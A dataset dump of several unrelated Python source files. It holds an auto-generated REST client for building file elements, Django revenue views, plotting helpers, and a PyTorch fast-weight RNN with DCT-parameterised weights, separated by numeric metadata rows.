kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.building_file_element_get_element_by_id = _Endpoint(
settings={
'response_type': (BuildingFileElementResponse,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/{id}',
'operation_id': 'building_file_element_get_element_by_id',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'id',
],
'required': [
'building_id',
'file_id',
'id',
],
'nullable': [
'id',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'id':
(str, none_type,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
'id': 'id',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__building_file_element_get_element_by_id
)
def __building_file_element_get_elements(
self,
building_id,
file_id,
**kwargs
):
"""Gets a building file's elements # noqa: E501
This API is ODATA enabled, the following filters can be used: * $select * $filter * $skip * $top [READ MORE](https://developer.microsoft.com/en-us/graph/docs/concepts/query_parameters) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_get_elements(building_id, file_id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[BuildingFileElementResponse]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
return self.call_with_http_info(**kwargs)
self.building_file_element_get_elements = _Endpoint(
settings={
'response_type': ([BuildingFileElementResponse],),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements',
'operation_id': 'building_file_element_get_elements',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
],
'required': [
'building_id',
'file_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__building_file_element_get_elements
)
def __building_file_element_update_element(
self,
building_id,
file_id,
id,
**kwargs
):
"""Updated an existing building file element # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_update_element(building_id, file_id, id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
id (str, none_type): The element identifier
Keyword Args:
building_file_element_request (BuildingFileElementRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
BuildingFileElementResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.building_file_element_update_element = _Endpoint(
settings={
'response_type': (BuildingFileElementResponse,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/{id}',
'operation_id': 'building_file_element_update_element',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'id',
'building_file_element_request',
],
'required': [
'building_id',
'file_id',
'id',
],
'nullable': [
'id',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'id':
(str, none_type,),
'building_file_element_request':
(BuildingFileElementRequest,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
'id': 'id',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'id': 'path',
'building_file_element_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client,
callable=__building_file_element_update_element
)
def __building_file_element_upsert_elements(
self,
building_id,
file_id,
**kwargs
):
"""Batch: upsert (insert or update) multiple new building file elements (max 500) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.building_file_element_upsert_elements(building_id, file_id, async_req=True)
>>> result = thread.get()
Args:
building_id (str): The building identifier
file_id (str): The file identifier
Keyword Args:
building_file_element_request ([BuildingFileElementRequest], none_type): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ElementBatchResult
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['building_id'] = \
building_id
kwargs['file_id'] = \
file_id
return self.call_with_http_info(**kwargs)
self.building_file_element_upsert_elements = _Endpoint(
settings={
'response_type': (ElementBatchResult,),
'auth': [
'ApiKeyAuth'
],
'endpoint_path': '/api/v3.0/building/{buildingId}/files/{fileId}/elements/batch',
'operation_id': 'building_file_element_upsert_elements',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'building_id',
'file_id',
'building_file_element_request',
],
'required': [
'building_id',
'file_id',
],
'nullable': [
'building_file_element_request',
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'building_id':
(str,),
'file_id':
(str,),
'building_file_element_request':
([BuildingFileElementRequest], none_type,),
},
'attribute_map': {
'building_id': 'buildingId',
'file_id': 'fileId',
},
'location_map': {
'building_id': 'path',
'file_id': 'path',
'building_file_element_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'text/json',
'application/*+json'
]
},
api_client=api_client,
callable=__building_file_element_upsert_elements
)
| 38.360184
| 1,015
| 0.472806
| 2,902
| 33,335
| 5.159545
| 0.090627
| 0.040072
| 0.062179
| 0.025646
| 0.885127
| 0.855874
| 0.846791
| 0.829293
| 0.824618
| 0.824618
| 0
| 0.003241
| 0.444728
| 33,335
| 868
| 1,016
| 38.404378
| 0.805673
| 0.329384
| 0
| 0.728785
| 0
| 0
| 0.225821
| 0.062667
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011647
| false
| 0
| 0.011647
| 0
| 0.034942
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c2621adc77a959a20fb6e54a775c55dd7e138ca2
| 507
|
py
|
Python
|
src/visualization/visualize.py
|
afederation/RescueForcast
|
c3aac61c353428eb8a7f60bbb2b3bb3c67f5b70f
|
[
"MIT"
] | null | null | null |
src/visualization/visualize.py
|
afederation/RescueForcast
|
c3aac61c353428eb8a7f60bbb2b3bb3c67f5b70f
|
[
"MIT"
] | null | null | null |
src/visualization/visualize.py
|
afederation/RescueForcast
|
c3aac61c353428eb8a7f60bbb2b3bb3c67f5b70f
|
[
"MIT"
] | null | null | null |
def missions_per_year(df):
'''
From a dataframe with the 'Year' column,
Plot a graph showing the number of missions per year
'''
missions_per_year = df.Year.value_counts()
plt.plot(missions_per_year.sort_index())
plt.show()
def missions_per_week(df):
'''
From a dataframe with the 'Year' column,
Plot a graph showing the number of missions per year
'''
missions_per_year = df.Year.value_counts()
plt.plot(missions_per_year.sort_index())
plt.show()
| 25.35
| 56
| 0.678501
| 76
| 507
| 4.315789
| 0.302632
| 0.268293
| 0.320122
| 0.155488
| 0.890244
| 0.890244
| 0.890244
| 0.890244
| 0.890244
| 0.890244
| 0
| 0
| 0.218935
| 507
| 19
| 57
| 26.684211
| 0.828283
| 0.368836
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c28461c5045ef0eb2f2589aab30b86de5b481a4c
| 3,960
|
py
|
Python
|
src/revenue/views.py
|
janakparajuli/Survey_Office
|
1d5eb673eef67f923bf4c2b24156bea76f5fc32d
|
[
"Apache-2.0"
] | null | null | null |
src/revenue/views.py
|
janakparajuli/Survey_Office
|
1d5eb673eef67f923bf4c2b24156bea76f5fc32d
|
[
"Apache-2.0"
] | null | null | null |
src/revenue/views.py
|
janakparajuli/Survey_Office
|
1d5eb673eef67f923bf4c2b24156bea76f5fc32d
|
[
"Apache-2.0"
] | null | null | null |
from urllib import quote_plus
from django.contrib import messages
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
# Create your views here.
from .tables import RevenueTable
from .models import Revenue
def revenue_list(request):
today = timezone.now().date()
revenueset_list = Revenue.objects.all()#filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
#queryset_list = Post.objects.filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
revenueset_list = Revenue.objects.all()
revenue = request.GET.get("q")
if revenue:
revenueset_list = revenueset_list.filter(
Q(month__icontains=revenue)|
Q(total_print_map_num__icontains=revenue)|
Q(total_trace_map_num__icontains=revenue)
).distinct()
paginator = Paginator(revenueset_list, 4) # Show 4 contacts per page
page_request_var='page'
page = request.GET.get(page_request_var)
try:
revenueset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
revenueset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
revenueset = paginator.page(paginator.num_pages)
revenueset.order_by="publish"
context = {
"object_list":revenueset,
"title":"List",
"page_request_var":page_request_var,
"today":today,
}
return render(request, "revenue_list.html", context)
def revenue_detail(request, id=None):
#instance = Post.objects(id=5)
instance = get_object_or_404(Revenue, id=id)
share_string = quote_plus(instance.month)
context = {
"month":instance.month,
"instance":instance,
"share_string":share_string
}
return render(request, "revenue_detail.html", context)#return HttpResponse("<h1>Detail<h1>")
def revenue_list_nep(request):
today = timezone.now().date()
revenueset_list = Revenue.objects.all()#filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
#queryset_list = Post.objects.filter(draft=False).filter(publish__lte=timezone.now())#.all()#.order_by("-timestamp")
if request.user.is_staff or request.user.is_superuser:
revenueset_list = Revenue.objects.all()
revenue = request.GET.get("q")
if revenue:
revenueset_list = revenueset_list.filter(
Q(month__icontains=revenue)|
Q(total_print_map_num__icontains=revenue)|
Q(total_trace_map_num__icontains=revenue)
).distinct()
paginator = Paginator(revenueset_list, 4) # Show 4 contacts per page
page_request_var='page'
page = request.GET.get(page_request_var)
try:
revenueset = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
revenueset = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
revenueset = paginator.page(paginator.num_pages)
revenueset.order_by="publish"
context = {
"object_list":revenueset,
"title":"List",
"page_request_var":page_request_var,
"today":today,
}
return render(request, "revenue_list_nep.html", context)
def revenue_detail_nep(request, id=None):
#instance = Post.objects(id=5)
instance = get_object_or_404(Revenue, id=id)
share_string = quote_plus(instance.month)
context = {
"month":instance.month,
"instance":instance,
"share_string":share_string
}
return render(request, "revenue_detail_nep.html", context)#return HttpResponse("<h1>Detail<h1>")
| 37.358491
| 130
| 0.705303
| 506
| 3,960
| 5.314229
| 0.203557
| 0.052064
| 0.041651
| 0.041651
| 0.853105
| 0.833023
| 0.833023
| 0.804016
| 0.804016
| 0.804016
| 0
| 0.009843
| 0.17904
| 3,960
| 105
| 131
| 37.714286
| 0.817287
| 0.208838
| 0
| 0.752941
| 0
| 0
| 0.075909
| 0.014152
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047059
| false
| 0
| 0.105882
| 0
| 0.2
| 0.023529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c2d735d5df0e32fd101ce4ba36d7e1367c0d7faa
| 202
|
py
|
Python
|
keras/applications/mobilenet.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 5
|
2020-11-30T22:26:03.000Z
|
2020-12-01T22:34:25.000Z
|
keras/applications/mobilenet.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 10
|
2020-12-01T22:55:29.000Z
|
2020-12-11T18:31:46.000Z
|
keras/applications/mobilenet.py
|
ikingye/keras
|
1a3ee8441933fc007be6b2beb47af67998d50737
|
[
"MIT"
] | 15
|
2020-11-30T22:12:22.000Z
|
2020-12-09T01:32:48.000Z
|
from tensorflow.keras.applications.mobilenet import MobileNet
from tensorflow.keras.applications.mobilenet import decode_predictions
from tensorflow.keras.applications.mobilenet import preprocess_input
| 50.5
| 70
| 0.89604
| 23
| 202
| 7.782609
| 0.434783
| 0.234637
| 0.318436
| 0.519553
| 0.77095
| 0.77095
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059406
| 202
| 3
| 71
| 67.333333
| 0.942105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
6c207881036cc5b79b74deb0da28511ec1ef7a2e
| 22,071
|
py
|
Python
|
dct_fast_rnn.py
|
kazuki-irie/dct-fast-weights
|
b2d81b910d6a879b832f5066a22a064ba57b7ff2
|
[
"MIT"
] | 4
|
2021-07-08T07:35:23.000Z
|
2022-01-05T03:00:34.000Z
|
dct_fast_rnn.py
|
kazuki-irie/dct-fast-weights
|
b2d81b910d6a879b832f5066a22a064ba57b7ff2
|
[
"MIT"
] | null | null | null |
dct_fast_rnn.py
|
kazuki-irie/dct-fast-weights
|
b2d81b910d6a879b832f5066a22a064ba57b7ff2
|
[
"MIT"
] | null | null | null |
# Fast RNN models with DCT-parameterized weights;
# DCT coefficients are parameterised by LSTMs.
import math
import torch
import torch.nn as nn
import torch_dct as dct
from external_torch_dct import DCTLayer
from custom_layer import LinearWithDCT
# Fast weight RNN layer with DCT-parameterized weights;
# DCT coefficients of both feed-forward and recurrent weights are
# parameterised by a "single" LSTM.
class FastDctRNN(nn.Module):
'''RNN with weights genereted by DCT related ops.'''
def __init__(self, input_dim, hidden_dim, sparsity_ih, sparsity_hh,
fast_weight_drop=0.0, dropout_dct=False, cuda=True,
batch_size=-1, coef_scale=True):
super(FastDctRNN, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.sparsity_ih = sparsity_ih
self.sparsity_hh = sparsity_hh
self.weight_drop = fast_weight_drop
self.dropout_dct = dropout_dct
self.cuda = cuda
self.batch_size = batch_size
if fast_weight_drop > 0.0:
self.wdrop = nn.Dropout(fast_weight_drop)
in_coeffs_dim, in_num_diags = self.get_sparse_config(
input_dim, hidden_dim, sparsity_ih)
hidden_coeffs_dim, hidden_num_diags = self.get_sparse_config(
hidden_dim, hidden_dim, sparsity_hh)
self.in_dct_layer = DCTLayer(
in_features=input_dim, type='dct', norm='ortho', cuda=cuda)
self.hid_dct_layer = DCTLayer(
in_features=hidden_dim, type='dct', norm='ortho', cuda=cuda)
self.in_idct_layer = DCTLayer(
in_features=input_dim, type='idct', norm='ortho', cuda=cuda)
self.hid_idct_layer = DCTLayer(
in_features=hidden_dim, type='idct', norm='ortho', cuda=cuda)
self.linear_with_dct = LinearWithDCT.apply
# number of diagonals
self.in_num_diags = in_num_diags
self.hidden_num_diags = hidden_num_diags
# number of DCT coefficients
self.in_coeffs_dim = in_coeffs_dim
self.hidden_coeffs_dim = hidden_coeffs_dim
self.fast_h_dim = self.in_coeffs_dim + self.hidden_coeffs_dim
self.fast_weights_lstm = nn.LSTM(input_dim, self.fast_h_dim)
print(f"Number of fast parameters: {self.fast_h_dim}")
if cuda:
device = "cuda"
self.coef_scale = coef_scale
if coef_scale:
print(f"coef_scale: {coef_scale}")
self.coef_scaler = nn.Parameter(
torch.ones([self.fast_h_dim], device=device),
requires_grad=True)
# This assumes that the batch size is same for all batches;
# which is ensured by the batch construction, but still not nice.
# TODO make this flexible.
self.ih_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.input_dim], device=device)
self.hh_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.hidden_dim], device=device)
# ih
list = []
# shape (2, len_coeffs)
ind = torch.triu_indices(
self.hidden_dim, self.input_dim, self.in_num_diags, device=device)
for i in range(batch_size):
for t in torch.unbind(ind, 1):
# (2, len_coeffs) -> (3, len_coeffs)
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.ih_ind = torch.stack(list).t()
# hh
list = []
ind = torch.triu_indices(self.hidden_dim, self.hidden_dim,
self.hidden_num_diags, device=device)
for i in range(batch_size):
for t in torch.unbind(ind, 1):
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.hh_ind = torch.stack(list).t()
bias_init = torch.rand([hidden_dim])
initrange = 1.0 / math.sqrt(hidden_dim)
nn.init.uniform_(bias_init, -initrange, initrange)
self.bias = nn.Parameter(bias_init)
def get_dct_init(self, len_coeffs, dim_out, dim_in, diag_shift):
factor = 1.
init = torch.rand([dim_out, dim_in])
if self.cuda: # TODO update to device.
init = init.cuda()
initrange = 1.0 / math.sqrt(dim_out)
nn.init.uniform_(init, -initrange, initrange)
init_f = torch.fliplr(dct.dct_2d(init, norm='ortho'))
ind = torch.triu_indices(dim_out, dim_in, diag_shift)
coeffs_init = init_f[tuple(ind)] * factor
return coeffs_init
def to_weights(self, coeffs, ind, zero_weights, linear1, linear2):
zero_weights_ = zero_weights.clone()
weights = torch.fliplr(zero_weights_.index_put_(tuple(ind), coeffs))
weights = linear1(weights)
weights = linear2(weights.transpose(-1, -2))
return weights.transpose(-1, -2)
def get_sparse_config(self, in_dim, out_dim, sparsity_level):
'''Get num_diagonals and num coeffs.
Given the dimension of matrix
in_dim: number of columns
out_dim: number of rows
We want to find the right diagonal shift "d" s.t.
N(d) < thr(desired sparsity) < N(d+1)
N(d+1)
We search as follows:
- If: N(0) is below thr: try N(n) for n = -1..-out_dim
- Else: try N(n) for n = 1..in_dim
input: 2 dimensions of the weight matrix
output: tuple (num_diagonal, num_coeff)
'''
total_el = in_dim * out_dim
thr = int(total_el * (1 - sparsity_level)) # just truncate fraction.
for num_diag in range(in_dim): # upper triagular matrix.
non_zeros = torch.triu_indices(out_dim, in_dim, num_diag).size()[1]
if non_zeros < thr:
break
if num_diag == 0: # also check the other direction
for neg_diag in range(-1, -out_dim, -1):
new_non_zeros = torch.triu_indices(
out_dim, in_dim, neg_diag).size()[1]
if new_non_zeros > thr:
# means that the previous one was the good one.
break
else:
non_zeros = new_non_zeros
num_diag = neg_diag
print(f"sparsity: {(total_el - non_zeros) / total_el * 100 :.1f} %"
f" vs. desired sparsity {sparsity_level * 100} %")
return non_zeros, num_diag
def get_weights(self, device):
# Generate the full weights.
# return: weights of shape (hidden_dim * 4 , input_dim * hidden_dim)
# input to hidden
w_ih = None
coeffs = self.coeffs_ih
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.ih_ind, self.ih_weights_f,
self.in_dct_layer, self.hid_dct_layer)
if w_ih is not None:
w_ih = torch.cat([w_ih, weights], dim=0)
else:
w_ih = weights
# hidden to hidden
w_hh = None
coeffs = self.coeffs_hh
if self.dropout_dct:
coeffs = self.wdrop(coeffs)
weights = self.to_weights(
coeffs, self.hh_ind, self.hh_weights_f,
self.hid_dct_layer, self.hid_dct_layer)
if w_hh is not None:
w_hh = torch.cat([w_hh, weights], dim=0)
else:
w_hh = weights
# concatenate both
# weights = torch.cat([w_ih, w_hh], dim=1)
return (w_ih, w_hh)
def forward(self, input_, hidden=None):
# input shape: (len, B, dim)
# output shape: (len * B, num_classes)
outputs = []
if hidden is None:
hidden_fast_weight = (
torch.zeros(1, input_.shape[1], self.fast_h_dim,
device=input_.device),
torch.zeros(1, input_.shape[1], self.fast_h_dim,
device=input_.device))
hidden = torch.zeros(
1, input_.shape[1], self.hidden_dim, device=input_.device)
else:
h, hidden_fast_weight = hidden
hidden = h
# compute fast weight first.
fast_output, hidden_fast_weight = self.fast_weights_lstm(
input_, hidden_fast_weight)
fast_output = torch.unbind(fast_output, dim=0)
for i, x in enumerate(torch.unbind(input_, dim=0)):
weights = fast_output[i]
if self.weight_drop > 0.0:
weights = self.wdrop(weights)
h = self.forward_step(x, hidden, weights)
outputs.append(h.clone())
hidden = h
op = torch.squeeze(torch.stack(outputs))
hidden = (h, hidden_fast_weight)
return op, hidden
def forward_step(self, x, prev_state, weights=None):
assert weights is not None
# One time step forwarding.
# input x: (B, in_dim)
# apply scalers to coeffs:
if self.coef_scale:
weights = self.coef_scaler.unsqueeze(0) * weights
ih_weight, hh_weight = torch.split(
weights, [self.in_coeffs_dim, self.hidden_coeffs_dim], dim=1)
h = torch.squeeze(prev_state)
bsz = x.shape[0]
if bsz != self.batch_size: # take sub-tensors
total_dim_coeffs = int(
bsz * self.ih_ind.shape[-1] / self.batch_size)
ih_ind = self.ih_ind[:, : total_dim_coeffs]
total_dim_coeffs = int(
bsz * self.hh_ind.shape[-1] / self.batch_size)
hh_ind = self.hh_ind[:, : total_dim_coeffs]
else:
ih_ind = self.ih_ind
hh_ind = self.hh_ind
out = self.linear_with_dct(
x, ih_weight,
self.in_idct_layer.weight,
self.hid_idct_layer.weight,
self.in_dct_layer.weight, self.hid_dct_layer.weight,
ih_ind, self.ih_weights_f, None)
out = out + self.linear_with_dct(
h, hh_weight, self.hid_idct_layer.weight,
self.hid_idct_layer.weight, self.hid_dct_layer.weight,
self.hid_dct_layer.weight,
hh_ind, self.hh_weights_f, self.bias)
out = torch.tanh(out)
return out
# Fast weight RNN layer with DCT-parameterized weights;
# DCT coefficients of feed-forward and recurrent weights are
# parameterised by "separate" LSTMs.
class SeparateFastDctRNN(nn.Module):
'''RNN with weights genereted by DCT related ops.'''
def __init__(self, input_dim, hidden_dim, sparsity_ih, sparsity_hh,
fast_weight_drop=0.0, dropout_dct=False, cuda=True,
batch_size=-1, coef_scale=True):
super(SeparateFastDctRNN, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.sparsity_ih = sparsity_ih
self.sparsity_hh = sparsity_hh
self.weight_drop = fast_weight_drop
self.dropout_dct = dropout_dct
self.cuda = cuda
self.batch_size = batch_size
if fast_weight_drop > 0.0:
self.wdrop = nn.Dropout(fast_weight_drop)
in_coeffs_dim, in_num_diags = self.get_sparse_config(
input_dim, hidden_dim, sparsity_ih)
hidden_coeffs_dim, hidden_num_diags = self.get_sparse_config(
hidden_dim, hidden_dim, sparsity_hh)
self.in_dct_layer = DCTLayer(
in_features=input_dim, type='dct', norm='ortho', cuda=cuda)
self.hid_dct_layer = DCTLayer(
in_features=hidden_dim, type='dct', norm='ortho', cuda=cuda)
self.in_idct_layer = DCTLayer(
in_features=input_dim, type='idct', norm='ortho', cuda=cuda)
self.hid_idct_layer = DCTLayer(
in_features=hidden_dim, type='idct', norm='ortho', cuda=cuda)
self.linear_with_dct = LinearWithDCT.apply
# number of diagonals
self.in_num_diags = in_num_diags
self.hidden_num_diags = hidden_num_diags
# number of coefficients
self.in_coeffs_dim = in_coeffs_dim
self.hidden_coeffs_dim = hidden_coeffs_dim
self.fast_weights_lstm_ih = nn.LSTM(input_dim, in_coeffs_dim)
print(f"Number of fast params input-to-hidden: {in_coeffs_dim}")
self.fast_weights_lstm_hh = nn.LSTM(input_dim, hidden_coeffs_dim)
print(f"Number of fast params hidden-to-hidden: {hidden_coeffs_dim}")
if cuda:
device = "cuda"
self.coef_scale = coef_scale
if coef_scale:
print(f"coef_scale: {coef_scale}")
self.coef_scaler_ih = nn.Parameter(
torch.ones([in_coeffs_dim], device=device), requires_grad=True)
self.coef_scaler_hh = nn.Parameter(
torch.ones([hidden_coeffs_dim], device=device),
requires_grad=True)
# This assumes that the batch size is same for all batches;
# which is ensured by the batch construction, but still not nice.
# TODO make this flexible.
self.ih_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.input_dim], device=device)
self.hh_weights_f = torch.zeros(
[batch_size, self.hidden_dim, self.hidden_dim], device=device)
# ih
list = []
# shape (2, len_coeffs)
ind = torch.triu_indices(
self.hidden_dim, self.input_dim, self.in_num_diags, device=device)
for i in range(batch_size):
# (2, len_coeffs) -> (3, len_coeffs)
for t in torch.unbind(ind, 1):
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.ih_ind = torch.stack(list).t()
# hh
list = []
ind = torch.triu_indices(
self.hidden_dim, self.hidden_dim, self.hidden_num_diags,
device=device)
for i in range(batch_size):
for t in torch.unbind(ind, 1):
list.append(
torch.cat((torch.tensor([i], device=device), t), dim=0))
self.hh_ind = torch.stack(list).t()
bias_init = torch.rand([hidden_dim])
initrange = 1.0 / math.sqrt(hidden_dim)
nn.init.uniform_(bias_init, -initrange, initrange)
self.bias = nn.Parameter(bias_init)
def get_dct_init(self, len_coeffs, dim_out, dim_in, diag_shift):
factor = 1.
init = torch.rand([dim_out, dim_in])
if self.cuda: # TODO update to device.
init = init.cuda()
initrange = 1.0 / math.sqrt(dim_out)
# initrange = 0.1
nn.init.uniform_(init, -initrange, initrange)
